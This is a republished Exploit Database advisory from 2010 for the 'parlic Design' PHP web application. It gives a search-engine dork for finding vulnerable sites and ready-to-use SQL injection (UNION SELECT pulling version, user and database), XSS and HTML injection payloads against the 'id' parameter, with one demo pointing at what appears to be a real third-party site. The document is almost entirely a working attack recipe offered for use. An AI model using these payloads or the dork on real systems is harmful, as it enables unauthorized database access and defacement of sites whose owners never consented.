parlic Design – SQL Injection / Cross-Site Scripting / HTML Injection

• Exploit Database
• 9 阅读

• 作者： XroGuE
  日期： 2010-05-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12767/

• =======================================================================
  # parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities
  =======================================================================
  
  ########################################################################
  # Name: parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities
  # Vendor: http://www.parlic.com
  # Date: 2010-05-27
  # Author: XroGuE
  # Thanks to: Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
  # Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
  # Home: (-_+)
  ########################################################################
  
  [+] Dork: intext:"Parlic Design" inurl:id
  intext:"design and developed by Parlic Design"
   
  
  [+] Vulnerabilities:
  
  http://[target]/[path]/*.php?id=[SQL/XSS/HTML]
  
  
  [+] XSS InjecTion Vulnerability:
  
  [+] Demo: http://[site]/ser/parohija.php?id=
  http://www.cadebou-royalmer.com/strane/pas.php?id=
  
  ########################################################################
  
  [+] HTML InjecTion Vulnerability:
  
  [+] Demo: http://[site]/ser/parohija.php?id=<marquee><font color=red size=15>XroGuE</font></marquee>
  http://[site]/strane/pas.php?id=<marquee><font color=red size=15>XroGuE</font></marquee>
  
  ########################################################################
  
  [+] SQL InjecTion Vulnerability:
  
  [+] Demo: http://[site]/ser/parohija.php?id=-999+union+all select+1,2,3,4,5,version(),user()--
  http://[site]/strane/pas.php?id=-999+UNION+SELECT+1,2,version(),user(),5,database(),7,8,9,10,11,12,13,14,15,16
  
  ########################################################################